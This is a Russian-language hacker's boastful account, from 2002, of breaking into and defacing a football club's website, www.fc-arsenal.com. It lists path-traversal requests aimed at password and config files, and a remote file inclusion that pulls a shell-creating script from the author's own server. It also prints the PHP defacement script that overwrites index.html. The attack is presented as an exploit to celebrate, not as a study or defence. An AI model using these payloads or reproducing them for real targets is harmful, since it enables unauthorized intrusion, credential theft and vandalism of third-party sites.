###########################################
#!/usr/share/doc/defaced/1/cases/fc_ars.txt
###########################################

Подробности взлома www.fc-arsenal.com  [ by OverG ]
-------------------------------------

Зеркало: http://taxidermia.void.ru/mirrors/2002/12/21/www.fc-arsenal.com/ 

Все  началось  21.12.2002  с  того, что какой-то чел написал в гостевой книге на
моём  сайте  чтобы я попробовал взломать www.fc-arsenal.com. В этот вечер делать
было нечего, скукатища полная, ну думаю попробую, да и не фанат я Арсенала ;)
Зашел  на  сайт,  поглядел  че  там  и  как. Решил для начала посмотреть наличие
форумов.  Но  их  там не оказалось! Гостевая книга и чат вроде тоже без багов. И
тогда  я наткнулся на скрипт новостей. Открыл его в новом окне, путь был таким -
http://www.fc-arsenal.com/new/main.php?news/news.php.    Вот    это   строка   -
main.php?news/news.php  - меня удивила! Не ужели это то, о чем я думаю? Не может
быть! На таком сайте, такая дыра... ДА, действительно, скрипт вставляет в правый
фрейм файл, указанный в параметрах его запуска.
Я   попробовал  main.php?/etc/passwd  и  передо  мной  отобразился  /etc/passwd.
Естественно,   что  ниче  хорошего  я  там  не  обнаружил.  Тогда  я  попробовал
main.php?/etc/shadow  и  main.php?/etc/master.passwd,  но  паролей я не получил,
прав  на  чтение  таких  файлов  не  хватает.  После  этого  я  попробовал найти
какие-нибудь  файлы,  в  которых могут хранится пароли или какая-нибудь полезная
информация, например логин и пароль от MySQL.

main.php?../_vti_pvt/service.pwd
main.php?../.htaccess
main.php?../.htpasswd
main.php?../../.htpasswd
main.php?../config.php
main.php?config.inc
main.php?config.php

Но  успехом  эти запромы не увенчались, никаких паролей я не получил. Попробовал
найти  и  получить  админку  гостевой  книги,  но  её там помоему вообще нет! :)
Новости  на сайт скорее всего добавляются автоматически через какой-то скрипт, и
возможно  требуется авторизация для доступа к нему. Но опять же ничего полезного
я не нашел :(
И   тогда   я   решил   попробовать   указать   ссылку   на   мой   PHP  скрипт.
main.php?http://overgsite.net/createshell.php.  Получилось!  Этот  скрипт создал
мне  Httpd  Shell на сервере, ввёл команду id - мои права - arsenal :). Теперь я
мог  видеть  все файлы, выполнять любые команды и делать вообще все, что угодно!
Полазив по файлам ничего хорошего я не нашел! Думаю ладно, надо дефейсить, я мог
бы  дефейснуть  командой  echo... Но тогда дефейс был бы plain-text'ом, а это не
красиво!
Я  написал  простенький  скрипт  для  дефейса,  который  открывал  index.html  и
записывал туда "текст дефейса".
Вот этот скрипт (deface.php):

$opnfile=fopen("../index.html","w");

fwrite($opnfile,"<html><BODY bgColor=#000000><title>DWC Gr0up own U :)</title>
<center><br><img src=http://overgsite.net/defacez/deface_2.gif>
<font color=white>Болейте за российский футбол!</center></html>");

fclose($opnfile);

Стоило  мне только выполнить main.php?http://overgsite.net/deface.php и все! Сайт
задефейсен!

P.S. Болейте за российский футбол ;)